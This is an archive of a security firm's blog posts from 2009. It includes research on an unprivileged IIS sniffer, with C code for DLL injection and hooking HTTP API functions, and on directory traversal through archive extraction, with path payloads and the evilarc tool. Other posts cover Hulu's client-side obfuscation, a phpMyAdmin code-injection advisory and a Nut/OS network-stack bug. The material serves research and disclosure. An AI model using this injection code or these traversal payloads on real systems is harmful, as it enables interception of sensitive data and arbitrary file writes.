Unprivileged Sniffing

May 18, 2009

The standard attack path against a hardened system almost invariably involves escalating privileges locally. Privileged access allows the attacker to do things like access all data on the server, sniff network traffic, and install root kits or other privileged malware. Typically, one of the goals of host hardening is to limit the damage that an attacker can do who has gained access to an unprivileged account. “Successfully” hardening a web server, for example, involves preventing the account used by the httpd service/server from modifying the source code of the application it hosts.

Imagine a web server that handles sensitive information, let’s say credit card numbers. This application runs through an interpreter invoked by a web server running as an unprivileged user. No matter how this data is encrypted when at rest, if it can be decrypted by the application, an attacker with the ability to invoke an arbitrary process at the same privilege level as this application will be able to recover the data. This is not true however of data which is stored as a hash or encrypted using an asymmetric public key where the private key is not present. In these cases an attacker is often forced to escalate local privileges to sniff data in transit either via network sniffing, or modifying encryption libraries. Even when data is stored in a retrievable format, especially on hardened systems, recovering this ultimately obfuscated data can be a daunting task for an attacker. Many applications now employ a multi-tiered approach which requires a significant amount of time and effort to attack and gain access to the critical keys or algorithms.

Given the architecture of Windows servers however, it is possible, via access to an unprivileged account such as Local Server, to implement a form of unprivileged sniffer which will monitor sensitive information as it is passed through the target application. This can be implemented in a way which would allow an attacker to trivially monitor all data in motion through the application. In the case of a web application this would include any parameters within a request, data returned by the server, or even headers like those used for basic authentication. This method is generic across applications and can be used to sniff encrypted connections.

The unprivileged sniffer doesn’t employ any tactics that are strictly new and although we haven’t seen this implemented in malware to date it wouldn’t be surprising if something similar has been done. The implementation I will describe is effective against IIS 6 but similar things could be implemented for other applications (SQL Server and Apache come to mind).

The first challenge in hooking into an IIS worker process or Application Pool (w3wp.exe) is knowing when it will start. A request coming into IIS is handled by the W3SVC service and passed off to an Application Pool via a named pipe. The service will either instantiate a new worker process passing the pipe name as an argument or assign the connection to an existing worker. The difficulty is that as the “Local Server” user we can not hook into the W3SVC itself so we must either constantly watch for new instantiations of ‘w3wp.exe’ or have some way of knowing when they start. By monitoring named pipes using the undocumented API ‘NtQueryDirectoryFile’ we can watch for the creation of pipes that start with ‘iisipm’. A pipe will be created each time a new worker is initialized giving us a head start hooking the new process.

Now that we know a process will be created we can do a standard library injection using code similar to the following to identify it and inject our sniffer. In this code LIBNAME represents the name of the DLL to inject.

PROCESSENTRY32 entry;

HANDLE snapshot;

BOOL r = FALSE;

DWORD TargetPID = NULL;

HANDLE Proc;

LPVOID LoadLibAddr, RemoteName;

/* Find the PID of the “w3wp.exe” process. */

entry.dwSize = sizeof(PROCESSENTRY32);

if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, (unsigned long)NULL)) != INVALID_HANDLE_VALUE) {

for (r = Process32First(snapshot, &entry); r; r = Process32Next(snapshot, &entry)) {

if (strstr(entry.szExeFile, “w3wp.exe”)) {

TargetPID = entry.th32ProcessID;

}

}

CloseHandle(snapshot);

}

if (!TargetPID) return;

/* Open the process */

if ((Proc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, FALSE, TargetPID)) == NULL) return;

/* Get the address of “LoadLibraryA” to use as our remote thread procedure */

if ((LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandleA(“kernel32.dll”), “LoadLibraryA”)) == NULL) goto out;

/* Allocate a block of memory within “w3wp.exe” to hold the name of the DLL we are injecting and copy it in */

if ((RemoteName = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(LIBNAME) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)) == NULL) goto out;

if (!WriteProcessMemory(Proc, (void *)RemoteName, LIBNAME, strlen(LIBNAME) + 1, NULL)) goto out;

/* Create a thread within “w3wp.exe” which will load our DLL into memory */

CreateRemoteThread(Proc, NULL, (unsigned long)NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (void *)RemoteName, (unsigned long)NULL, NULL)

out:

CloseHandle(Proc);

We now have our library loaded into the address space of the worker process. When this occurs the entry point of our library will be called. We will use the concept of a trampoline to hook certain calls within the w3wp process. Specifically IIS uses a library called HTTPAPI for passing around HTTP requests and responses. By hooking into the following calls we can examine requests and responses passed through this worker.

  • HttpReceiveHttpRequest
  • HttpReceiveRequestEntityBody
  • HttpSendHttpResponse
  • HttpSendResonseEntityBody

As an example the following stub shows one way of hooking ‘HttpReceiveHttpRequest’.

/* This will store the address of the HttpReceiveHttpRequest function */

typedef ULONG (*HttpReceiveHttpRequestType)(HANDLE, ULONGLONG, ULONG, PHTTP_REQUEST, ULONG, PULONG, LPOVERLAPPED);

HttpReceiveHttpRequestType HttpReceiveHttpRequestSaved;

/* The trampoline structure is used to save both the original 6 bytes of the function we are hooking and the new instructions we replace them with */

typedef struct _trampoline {

char push;

void *func;

char ret;

} Tramp, *PTramp;

Tramp HRHR, oldHRHR;

HMODULE lib;

SIZE_T i;

/* Ensure that HTTPAPI.dll has been loaded */

lib = LoadLibraryA(“HTTPAPI.dll”);

/* Save the address of “HttpReceiveHttpRequest” */

HttpReceiveHttpRequestSaved = (HttpReceiveHttpRequestType)GetProcAddress(lib, “HttpReceiveHttpRequest”);

/* 0×68 is the x86 PUSH instruction */

HRHR.push = 0×68;

/* We are pushing the address of our hook */

HRHR.func = (HttpReceiveHttpRequestType *)&HttpReceiveHttpRequestHook;

/* 0xC3 is the x86 RETN instruction which will pop the value we just pushed and jump to that location. This effectively hijacks the flow of execution */

HRHR.ret = 0xC3;

/* We then read the original 6 bytes of the HttpReceiveHttpRequest function */

ReadProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* And replace it with our trampoline code */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

We have now replaced the first six bytes of the ‘HttpReceiveHttpRequest’ function mapped within the ‘w3wp.exe’ process to redirect the flow of execution into our hook procedure. Now by creating a hook we can sniff any data passed through this function by implementing code similar to the following.

ULONG HttpReceiveHttpRequestHook(HANDLE ReqQueueHandle, ULONGLONG RequestId, ULONG Flags, PHTTP_REQUEST pRequestBuffer, ULONG RequestBufferLength, PULONG pBytesReceived, LPOVERLAPPED pOverlapped) {

ULONG ret;

SIZE_T i;

HANDLE log;

/* First we replace the first 6 bytes of the real ‘HttpReceiveHttpRequest’ function with their original value */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* We then call the real function and save the return value */

ret = HttpReceiveHttpRequestSaved(ReqQueueHandle, RequestId, Flags, pRequestBuffer, RequestBufferLength, pBytesReceived, pOverlapped);

/* At this point all data with the HTTP_REQUEST stored at pRequestBuffer is valid and can be saved to a file or sent out over the network. This data includes the request headers and Get parameters passed with the request */

/* After we have performed our sniffing operations we write our trampoline back into the real function */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

/* And return the saved return value */

return ret;

}

If similar hooks were implemented for each of the functions listed above all information in and out of IIS could be sniffed in a way which is generic to the web application being used.

Although this implementation is deliberately incomplete it demonstrates one use case for an unprivileged sniffer. This type of attack is possible in Windows due to  specifics of process creation and how privileges are dropped. It is worth mentioning that a similar attack is generally not possible in similar Linux services. In Linux the ability to ptrace a process is controlled by the dumpable flag within the mm member of the process’ task_struct. When privileges are dropped the dumpable flag is unset and this is inherited when a fork or execve occurs. This prevents the owning user of the resulting process from modifying the process’ execution. Because lower privilege workers are not newly created processes in Linux but rather inherit their task_struct from the root owned parent, they are not debuggable by the lower privileged worker account.

We are not currently aware of a way of preventing this type of attack. The Windows privilege structure, and individual privileges such as the seDebugPrivilege are not designed to prevent access to the owning user. If a fix is possible it would likely relate to the creation of the worker processes and would require modification of the individual applications. If you have an idea for a fix please let us know.


The case for extending XBRL to encompass a Risk and Control taxonomy

May 1, 2009

Through the SEC’s ‘21st Century Disclosure Initiative‘ announced in January 2009, and their demand that Fortune 500 companies start XBRL tagging of financial statements and footnotes this year, it’s clear that greater transparency associated with financial reporting and transactions is seen as one of the steps towards improving the ability of investors and lenders to analyse and compare reports of financial performance and strategic declarations. By adopting such a standard, the SEC is seeking to provide investors and lenders with greater confidence in the results of their analysis because there is a defined taxonomy that ensures they are analysing and comparing apples to apples in all aspects of relevant financial statements.

That’s good, it’s helpful and the derived confidence will be further enhanced through the involvement of an Assurance Working Group (AWG) that is co-operating with the International Audit and Assurance Standards Board (IAASB) to develop standards around how XBRL information can be audited.

Whilst XBRL was initially designed to allow standard tagging of financial reporting, it also can be used for financial statements around transaction information, discrete projects and initiatives, etc. It would seem, therefore, that if XBRL tagging could be extended to encompass risk and control information by introducing an extended taxonomy for that, then, perhaps, a far more meaningful value could be associated with those financial statements, or the validity of them could be better trusted.

When Credit Default Swaps (CDS) were sold on, and on, and on, imagine if along with the financial details of the transaction there was a clear statement about the associated risks, along with details of what mitigation measures were in place and how effective they were likely to be. Surely, that would have allowed the prevention of them being significantly over valued or at least recognition that they were being overvalued despite their associated risks.

Ultimately the whole issue of trust is at the hub of the financial crisis we find ourselves in and, interestingly, it parallels an observation that the American economist John Kenneth Galbraith made in 1954. He observed that fraud can be easily hidden in the good times, yet it gets revealed in the bad times, which he called the ‘bezzle’. With reference to the great crash of 1929 he wrote,”In good times people are relaxed, trusting, and money is plentiful. But even though money is plentiful, there are always many people who need more. Under these circumstances the rate of embezzlement grows, the rate of discovery falls off, and the bezzle increases rapidly. In depression all this is reversed. Money is watched with a narrow, suspicious eye. The man who handles it is assumed to be dishonest until he proves himself otherwise. Audits are penetrating and meticulous. Commercial morality is enormously improved. The bezzle shrinks.” He also observed that “the bezzle is harder to hide during a tougher economic climate” because of the demand for increased scrutiny.

Applying a similar theory to our CDS example, in the good times the bezzle was large, and there were high levels of trust between the banks and asset management companies, thus, nobody really worried about the increasing risks. But now the bezzle has been revealed, trust has all but disappeared and the market has stagnated.

Hence, it is my belief that additional assurance will be required around financial reporting, particularly with specific transactions, such that a high level of trust can be regained. This will not occur through a high bezzle which exists due to positive market conditions. Rather, it will occur through qualified assurance and tangible evidence of the levels of associated risks and how effectively they are being mitigated. Taking the CDS situation as an example, if the level of associated risk and the efficacy of the control strategy accompanies the transaction the buyer will be better informed and the information will have higher trust.

In my view, therefore, the XBRL taxonomy must extend to include taxonomy around risk and control information.


Directory Traversal in Archives

April 21, 2009

By: Greg Ose and Patrick Toomey

I’m sure on the top of everyone’s list of resolutions from the New Year is the ever forgotten “I will write more secure code” and it seems that each year this task gets harder. With more complex and abstracted frameworks and APIs, the ways security related bugs are being introduced to a code base has become equally complex and abstracted. Being a few months into 2009, hopefully we can help you catch up on your resolutions by presenting something else to look for when reviewing or writing secure code.

In recent engagements, we have run into a slew of issues focusing around the well-known vulnerability of directory path traversal. As a refresher, this typically involves injecting file path meta-characters into a filename string to reference arbitrary files and usually results in the modification or disclosure of files on the system. For example, a user supplies the filename /../../etc/passwd which is appended to the path /tmp/uploaded_pictures and ends up referencing the password file instead of a file under the intended directory.

We all know, or at least should know, what a typical directory traversal vulnerability and exploit looks like, however, we have recently seen these issues manifest themselves in the handling of user-provided archive files instead of file path strings. Typically, these user provided files are sent via HTTP uploads. Almost all of the common high-level application APIs provide a means, or a third-party library, to handle archive files. Additionally, almost all of these libraries do not check for potential directory path traversal when they perform the extraction of these files. This puts the liability on the developer to check for malicious archives. While file operation calls with a user controlled variable may be obvious, filenames within user-controlled archives may be the vulnerability that slips by. Developers should not only validate user supplied file paths for directory traversal, but also check file paths included in archive files. As a note, this type of vulnerability has been mentioned before and is not groundbreaking by any means, but we want to take a detailed look into what to be aware of as a developer and how to test for this during vulnerability assessments.

To get started lets take a look at an example provided by Sun themselves (!!!) in a technical article for the java.util.zip package. Code Sample 1 from the article provides their base example for extracting an archive and is shown below.

import java.io.*;
import java.util.zip.*;

public class UnZip {
  final int BUFFER = 2048;
  public static void main (String argv[]) {
    try {
      BufferedOutputStream dest = null;
      FileInputStream fis = new FileInputStream(argv[0]);
      ZipInputStream zis = new ZipInputStream(
                               new BufferedInputStream(fis));
      ZipEntry entry;
      while((entry = zis.getNextEntry()) != null) {
        System.out.println("Extracting: " +entry);
        int count;
        byte data[] = new byte[BUFFER];
        // write the files to the disk
        FileOutputStream fos = new FileOutputStream(
                                   entry.getName());
        dest = new BufferedOutputStream(fos, BUFFER);
        while ((count = zis.read(data, 0, BUFFER)) != -1) {
          dest.write(data, 0, count);
        }
        dest.flush();
        dest.close();
      }
      zis.close();
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}

We can see where the vulnerability manifests itself in processing each entry of the provided ZIP file:

FileOutputStream fos = new FileOutputStream(entry.getName());

entry is the current ZIP entry being processed and getName() returns the filename stored in that entry. After retrieving this filename, the uncompressed data is written to its value. We can see that by using directory traversal in the filename a malicious user may be able to make arbitrary writes anywhere on the filesystem. Unfortunately, on most platforms, if an attacker can arbitrarily write files they can most likely also get arbitrary code executed on the affected server.

Similar issues exist with a number of ZIP library implementations across various languages. As one might expect, the equivalent Python code is far less verbose. While Python doesn’t provide any sample code, a simple, and vulnerable, ZIP extraction would look as follows:

from zipfile import ZipFile
import sys
zf = ZipFile(sys.argv[1])
zf.extractall()

The extractall method does what one would expect it to do, except that it does not check for directory traversal in the ZIP entries’ file paths. Python also provides equivalent objects for handling tar archives. Interestingly, the tar archive library documentation does make mention of the risk associated with path traversal within archive files. The documentation for the extractall method states:

Warning: Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with “/” or filenames with two dots “..”.

How about PHP, surely they provide a function to work with ZIP files (what don’t they have a function for). The PHP manual provides the following example code for extracting ZIP files.

<?php
$zip = new ZipArchive;
$res = $zip->open('test.zip');
if ($res === TRUE) {
  echo 'ok';
  $zip->extractTo('test');
  $zip->close();
} else {
  echo 'failed, code:' . $res;
}
?>

Sure enough, this code is also vulnerable to file path manipulation within the archive.

What about everyone’s favorite language du jour, Ruby? Ruby itself does not have ZIP file extraction built in to the language’s core library. However, rubyzip is a popular third-party library and like the prior libraries, is also vulnerable to directory traversal. The example below was stated in a post by the library’s author as how to extract a ZIP file and all of its directories:

require 'rubygems'
require 'zip/zipfilesystem'
require 'fileutils'

OUTDIR="out"

Zip::ZipFile::open("all.zip") {
  |zf|

  zf.each { |e|
    fpath = File.join(OUTDIR, e.name)
    zf.extract(e, fpath)
    FileUtils.mkdir_p(File.dirname(fpath))
  }
}

Finally, similar to Ruby, the .Net environment does not have ZIP archive handling built in to the core library. A quick googling for “.Net zip files” leads to an article on MSDN. In this article, the authors detail this gap in the .Net library and then go on to present a solution. The tools released include a signed DLL for use during development and a set of command-line utility programs that utilize the library. One of these command-line utilities is Unzip.exe. Sure enough, Unzip.exe is vulnerable to path traversal within an archive. No warning is presented and the archive is extracted without concern to the fully resolved path of the files within the archive.

How do mainstream, standalone, compression utility programs handle this vulnerability? We tested a large number of archive extraction programs (Winzip, Winrar, command line Info-Zip, unzip on Unix, etc) and noted that all of them either provide a warning when a ZIP file entry contains directory traversal, escape the meta-characters, or just ignore the traversed directory path all together.

When writing code that interacts with archives, the same precautions used by mainstream extraction utilities must be performed by the developer. As with any user-controlled input, the directory filenames should be validated before being processed by any file operation. The developer should verify that path traversal characters do not occur in any entries within the archive. Similarly, the developer may also leverage utility functions within their language to first determine the fully resolved path before extracting an entry (ex. os.path.normpath(path) in Python).

A more drastic mitigation, though perhaps the better long-term solution, would involve modifying these default libraries to work similarly to their standalone application counterparts by default. It is extremely rare to require path traversal characters in a legitimate archive. Perhaps, the libraries should be modified to secure the common case, requiring a developer to explicitly request the atypical case. For example, what if the Python ZipFile object changed its default behavior to throw an exception in the presence of file traversal characters? The extractall method signature could be modified as follows:

ZipFile.extractall([path[,members[,pwd[,allow_traverse]]]])

By default the allow_traverse is set to False, throwing zipfile.BadZipfile if path traversal characters are encountered. This would provide a secure by default configuration for the library while still allowing the existing behavior if necessary. This requires the developer to explicitly request support for path traversal, thus mitigating accidental and insecure usage. This is unlikely to impact existing code, as archives with path traversal characters are not easy to create and it is extremely unlikely a legitimate archive would accidentally include such characters.

During the course of this write-up we grew tired of hand-editing zip archives in a hex-editor to add directory traversal characters. So, we put together a Python script that can be used to generate ZIP archives with path traversal sequences automatically inserted. It can create directories in both Unix and Windows environments for ZIP files (including jar) and tar files with and without compression (gzip or bzip2). You can specify an arbitrary number of directories to traverse and an additional path to append (think var/www or Windows\System32). The full usage follows:

$ ./evilarc.py --help
Usage: evilarc <input file>

Create archive containing a file with directory traversal

Options:
  --version      show program's version number and exit
  -h, --help     show this help message and exit
  -f OUT, --output-file=OUT
                 File to output archive to.  Archive type is
                 based off of file extension.  Supported
                 extensions are zip, jar, tar, tar.bz2, tar.gz,
                 and tgz.  Defaults to evil.zip.
  -d DEPTH, --depth=DEPTH
                 Number directories to traverse. Defaults to 8.
  -o PLATFORM, --os=PLATFORM
                 OS platform for archive (win|unix). Defaults
                 to win.
  -p PATH, --path=PATH  Path to include in filename after
                 traversal.  Ex:WINDOWS\System32\

The following example shows the file test.txt being added to an archive and extracted to the C:\Windows\System32 directory through the vulnerable Java class we previously discussed:

$ ./evilarc.py test.txt -p Windows\\System32\\
Creating evil.zip containing ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ java javaunzip evil.zip
Extracting: ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ ls -al /cygdrive/c/Windows/System32/test.txt
-rwxr-x---+ 1 gose mkgroup-l-d 21 Feb 24 11:52 /cygdrive/c/Windows/System32/test.txt

We have made the script available for download here:

http://www.neohapsis.com/downloads/evilarc.py


Spring Forward

April 20, 2009

As with many, the economic climate has made it challenging to publish as many interesting and insightful concepts and considerations on our blog and in articles as we’d like.   We’ve been focusing our energy on our services and product development staying steadfast in our commitments to our customers and staff.  It’s Spring though and time again to shake off the cobwebs, put on the rubber boots, and march through the mud and puddles to join the tulips and blog for a renewed beginning.

Our work is about exploring the possibilities as much as it is about identifying vulnerabilities, assessing and managing risks, and strategically advising our customers.  Our history and future, as with much of the industry, is predicated on both dotting the i’s, crossing the t’s and delving deeper into ‘why’s’ and ‘what if’s.’  It’s often about conspiring to understand the likes of:

1) Why a seemingly meaningless design, development or implementation trend may cause meaningful and unexpected repercussions in the future

2)  How best practices can come to terms with a Linux distribution when volumes of modules may be installed and loaded by default

3)  What PCI merchants should do to continually be compliant and mitigate their risks and liability

4)  How global earthquakes in the financial sector and a renewed desire to re-establish integrity and transparency may be represented logically in a series of meta-models, frameworks and content which can be visualized to articulate the complexity of associated risks

While many of our explorations have not been published in past weeks, the discussions have continued.  Along with the day to day and a new website, we’ve been researching and writing and debating and discussing findings, theories and concepts, that enlighten our days with meaning and thoughtfulness.    We have been grappling with an assortment of grandiose ideas and mundane mutterings to develop momentum and content that will provide discussions on a more regular and consistent basis.

Welcome to spring, we look forward to conversing with you and appreciate any feedback and thoughts you have that are relevant to you and your challenges.


Hulu…client-side “encryption”…seriously?

April 14, 2009

By: Patrick Toomey

I remember being pretty excited by the prospect of a service like Hulu.   The idea that major networks were actually coming together to stream mainstream video content was impressive.  It was such a departure from the locked down, share nothing, mentality of old.   I thought to myself, “Wow, does Hollywood finally get it?”. Apparently my optimism was exactly that…optimistic.

Sometime in the last week or so it was reported that Hulu, a video streaming service run by NBC and FOX, started “encrypting” Ajax responses to block unauthorized software clients (Boxee et al.) from sidestepping the hulu.com website to view content.  However, encryption is purposefully in quotes, as what Hulu actually implemented is a client-side obfuscation mechanism.  It it well known that such protection mechanisms are flawed by design and bound to be circumvented quickly.

The protective measure that is implemented rests on the obfuscation of Ajax responses made against hulu.com.  Instead of returning plaintext HTML content, Ajax requests return obfuscated URL encoded strings.  These URL encoded strings are reverted to plaintext on the client-side using JavaScript.  For example, a request to:

http://www.hulu.com/channels/Home-and-Garden?kind=videos&sort=popularity

returns a URL encoded string that begins:

dobfu__%F2%9E%84%88%EE%99%81%9F%BD%89%D0%DC …

The entire string is approximately 141KB long.  Other than the “dobfu__” prefix, the remainder of the string is URL encoded.  This obfuscated string is transformed into plaintext by a JavaScript function called “_dobfu()”.  This function, after a bit of reformatting, is reproduced below:

function _dobfu(text) {
  return text.slice(0,7)!='dobfu__'?text:
    $A(unescape(text.substring(7)).tol()).map(function(i) {
      i=0xfeedface^i;
      return String.fromCharCode(i&0xFF,i>>>8&0xFF,i>>>16&0xFF,i>>>24&0xFF);
    }
  ).join('').replace(/\+$/,'');
}

All of the above code is pretty easy to follow, save for the references to $A() and the the tol() functions.  The $A() function is a Prototype global function that creates a full array object from any other object that can pass for an array (supports indexing, etc).  This is done so that the new object inherits the full functionality of an array (the map method is needed in this case).  The second piece of ambiguous logic , the tol() method, is defined in another JavaScript file and is reproduced below:

String.prototype.tol=function(){
  var s=this;
  return $R(0,Math.ceil(s.length/4)-1).map(
    function(i){
      return s.charCodeAt(i*4)+(s.charCodeAt(i*4+1)<<8)+(s.charCodeAt(i*4+2)<<16)+(s.charCodeAt(i*4+3)<<24);
    }
  );
};

Essentially this method takes a string of bytes and creates an array of 32-bit integers from each 4-byte chunk.  For example, if the string processed in the method was “\x01\x23\x45\x67\x89\xab\xcd\xef” the method would return the array [0x67452301, 0xefcdab89].  The ordering of the individual bytes is a result of the “tol()” method parsing the data as little-endian.

So, with those two functions defined we can quickly describe how Hulu de-obfuscates responses.  The obfuscated string is broken up into 4-byte integers.  Since the length of the obfuscated string is always evenly divisible by four we are guaranteed that a string of length x will turn into an array of 4-byte integers of length x/4.  Then, for each 4-byte integer, the value is XORed with the constant “0xfeedface”.  Once XORed, the individual bytes from the integer are split apart and converted back to their equivalent ASCII value.  Finally, all trailing NULL bytes are removed from the de-obfuscated string.

It is a bit difficult to imagine what Hulu thought they might accomplish with the above scheme.  It effectively does nothing to prevent third-party tools from performing the same obfuscation/de-obfuscation.  Any scheme that attempts to implement client-side “decryption”, particularly in JavaScript, is bound for failure.  The client possesses the obfuscated message, the key to de-obfuscate the message, and the Javascript that executes the algorithm.   Using these components, it is a trivial exercise to transform any obfuscated response back into plaintext.  Hulu likely thwarted unauthorized software for the better part of an afternoon and no more.  Client-side security mechanisms simply don’t work.  Even complex systems implemented in native code, such as popular DRM schemes, that may go unbroken for a period of time, will eventually be circumvented.  However, to implement a similar preventative measure in JavaScript lowers the difficulty of circumvention dramatically.

Beyond the technical discussion there is also a more broad question to be asked.  What was the net gain for Hulu?  They failed to accomplish their implicit goal: to block unauthorized software.  Hulu simply received another  bit of bad press for treating their customers like thieves.  Hulu, and other such services, need to realize that the ubiquitous availability of their content will ultimately grow their fan base.  There is ever increasing competition for a viewer’s eyes and ears.  Podcasts, YouTube, gaming, etc are all competing.  Third-party products, such as Boxee, only serve to increase the ubiquity of their content, which shouldn’t be viewed as a bad thing.  Thwarting their own customers only sours the experience and reinforces the presumption that a good chunk of the entertainment industry just doesn’t get it.  Besides being bad security, this latest debacle is just bad business.


About CVE-2009-1151

April 6, 2009

During an evaluation of tools for internal use, we took a look at phpMyAdmin. During the assessment, we identified that the scripts/setup.php script is used to generate a configuration file to config/config.inc.php. Anytime PHP code is being generated, extremely careful filtering must be done to ensure that the intended output cannot be escaped and will not allow the injection of arbitrary code.

While the most obvious inputs, those set by the configuration fields, were escaped properly, other attacker accessible data was not. The script passes PHP serialized data back and forth through the configuration parameter. When a save action is performed, this data is then written as PHP variables to the configuration file. The data contains associative arrays with key and value pairs. On output, the values are properly escaped using add_slashes, however the keys that are also output are not filtered. By modifying the array keys in the serialized data passed to a save POST request, the key name can be escaped and arbitrary PHP code injected. If config/ is writable by the web server user, the config.inc.php file is written to it and can be executed directly out of the document root.

The issue was disclosed to the phpMyAdmin team and they did an amazing job responding to this disclosure with a patch out in less than 24 hours!

Lessons learned? Anytime you are programmatically generating code (be it HTML, JavaScript, PHP, etc.) ensure that your output is properly filtered and make sure all installation scripts and unneeded administration tools are removed.

References:
Advisory: http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
Patch: http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12301
CVE: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1151


Response to Visa’s Chief Enterprise Risk Officer comments on PCI DSS

March 27, 2009

Visa’s Chief Enterprise Risk Officer, Ellen Richey, recently presented at the Visa Security Summit on March 19th. One of the valuable points made in her presentation was defending the value of implementing PCI DSS to protect against data theft. In addition, Ellen Richey spoke about the challenge organizations face, not only becoming compliant, but proactively maintaining compliance, defending against attacks and protecting sensitive information.

Recent compromises of payment processors and merchants that were stated to be PCI compliant have brought criticism to the PCI program. Our views are strongly aligned with the views presented by Ellen Richey. While the current PCI program requires an annual audit, this audit is simply an annual health-check. If you were to view the PCI audit like a state vehicle inspection. Even though at the time of the inspection everything on your car checks out, this does not prevent the situation of days later your brake lights go out. You would still have a valid inspection sticker, but are no longer in compliance with safety requirements. It is the owner’s responsibility to ensure the car is maintained appropriately. Similarly in PCI, it is the company’s responsibility to ensure the effectiveness and maintenance of controls to protect their data in an ongoing manner.

Ellen Richey also mentioned increased collaboration with the payment card industry, merchants and consumers. Collaboration is a key step to implementing the technology and processes necessary to continue reducing fraud and data theft. From a merchant, service provider and payment processor perspective, new technologies and programs will continue to reduce transaction risk, but, today, there are areas where these organizations need to proactively improve. The PCI DSS standard provides guidance around the implementation of controls to protect data. Though in addition to protecting data, merchants, service providers and processors need to proactively address their ability to detect attack and be prepared to respond effectively in the event of a compromise. These are two areas that are not currently adequately addressed by the PCI DSS and are areas where we continue to see organizations lacking.

See the following link to the Remarks by Ellen Richey, Chief Enterprise Risk Officer, Visa Inc. at the Visa Security Summit, March 19, 2009:

http://www.corporate.visa.com/md/dl/documents/downloads/EllenRichey09SummitRemarks.pdf


Exploiting Embedded Devices (Part 1)

November 17, 2008

Recently we have been assessing an increasing number of embedded devices. Seeing as the methods for carrying out this type of assessment are not at all well defined, I am starting a series of posts discussing vulnerabilities and exploitation on embedded platforms.

In recent years the exploitation of common vulnerability classes on the most popular platforms has become increasingly difficult. Although vulnerabilities are still common, especially in client side applications, exploiting these vulnerabilities often becomes a complex matter of bypassing multiple protection mechanisms including stack cookies, heap verification, and data execution prevention. However, with the move towards miniaturization, products are increasingly giving up these protections and moving to largely untested platforms. Often the base libraries and operating systems chosen for these devices contain trivially exploitable vulnerabilities.

Several months ago I assessed a product which included a networked device based on Nut/OS. This minimal operating system describes itself as follows:

Nut/OS is an intentionally simple RTOS for the ATmega128, which provides a minimum of services to run Nut/Net, the TCP/IP stack. It's features include:
+  Non preemptive multithreading.
+  Events.
+  Periodic and one-shot timers.
+  Dynamic heap memory allocation.
+  Interrupt driven streaming I/O.

Main features of the TCP/IP stack are:
+  Base protocols ARP, IP, ICMP, UDP and TCP.
+  User protocols DHCP, DNS and HTTP.
+  Socket API.
+  Host, net and default routing.
+  Interrupt driven Ethernet driver.

While assessing the device, one of the most exposed components was the network stack. Some discussion of the network stack of this minimal operating system is in order. The vulnerability I will discuss has now been patched but the vulnerable version of the operating system can be downloaded here. An incoming IP packet is passed from the device driver into NutEtherInput() and on into NutIpInput() where it is demuxed to determine its protocol and passed to the appropriate component. Within NutIpInput(), on line 187 of net/ipin.c, the length of the IP header is calculated and used without being verified for sanity. The length of the IP header is a 4 bit value which is multiplied by 4 to determine the length in 32 bit words. Later on lines 250, 251, and 252 several lengths are calculated based on this value as well as the unchecked length for the entire packet. This vulnerability leads to a number of interesting conditions throughout the network stack where pointers to protocol headers and data are calculated based on incorrect IP header lengths.

void NutIpInput(NUTDEVICE * dev, NETBUF * nb) {
...
ip_hdrlen = ip->ip_hl * 4;
if (ip_hdrlen < sizeof(IPHDR)) {
NutNetBufFree(nb);
return;
}
...
nb->nb_nw.sz = ip_hdrlen;
nb->nb_tp.vp = ((char *) ip) + (ip_hdrlen);
nb->nb_tp.sz = htons(ip->ip_len) - (ip_hdrlen);

The most interesting of these, from the perspective of exploitation, are strangely in one of the simplest protocol handlers; namely ICMP. This arises largely from the fact that the buffers allocated for incoming echo requests are reused for the responses. The responses are sent through NutIcmpOutput() in net/icmpout.c. To exploit this we need data to be written to a pointer which can be pushed forward into another chunk of heap memory by specifying an incorrect IP header length. Only two writes meet these criteria. The first is the type field of the ICMP packet and in this case will always be NULL. Although it may be possible to gain execution in some cases with the ability to overwrite heap memory with a null, in this case, there is a more interesting alternative. The second field which is written is a checksum of the ICMP portion of the packet (which is data that we control at least parts of). So, by specifying an IP header length which is larger than the true length (typically 5) and controlling the calculated checksum, we can write an arbitrary 2 bytes to any 32 bit boundary within 9 (the largest IP header length 15 minus (the smallest IP header = 5 plus the size of the ICMP header = 1)) words of the end of our packet in memory.

int NutIcmpOutput(uint8_t type, uint32_t dest, NETBUF * nb) {
ICMPHDR *icp;
uint16_t csum;
icp = (ICMPHDR *) nb->nb_tp.vp;
icp->icmp_type = type;
icp->icmp_cksum = 0;
csum = NutIpChkSumPartial(0, nb->nb_tp.vp, nb->nb_tp.sz);
icp->icmp_cksum = NutIpChkSum(csum, nb->nb_ap.vp, nb->nb_ap.sz);
return NutIpOutput(IPPROTO_ICMP, dest, nb);
}

This leads us to another difficulty, the Nut/OS heap implementation (specifically the use of singley linked lists). I will go into this in more detail in another post but for now I want to talk about another vector for the exploitation of this vulnerability. In many cases the rather limited memory of an embedded device contains information that would be useful to an attacker. Things like encryption keys, and passwords are all stored in the same address space that the network stack is operating on. If you have been following along you may see where I am going with this. When we specify a packet length (not ip->ip_hl but instead ip->ip_len) in the IP header of an ICMP echo request that is larger than the actual packet sent, a condition results where the excess length for the echo response is pulled from the memory directly after the allocated buffer. By sending a ICMP echo request with no data and a long length we can effectively read chunks of memory from the vulnerable device. To obtain the maximum amount of memory it is possible, by forcing allocations and deallocations using particulars of the TCP stack, to change the location where the packet buffer is allocated.

Visualizing the attack with ninjas

Visualizing the attack with ninjas

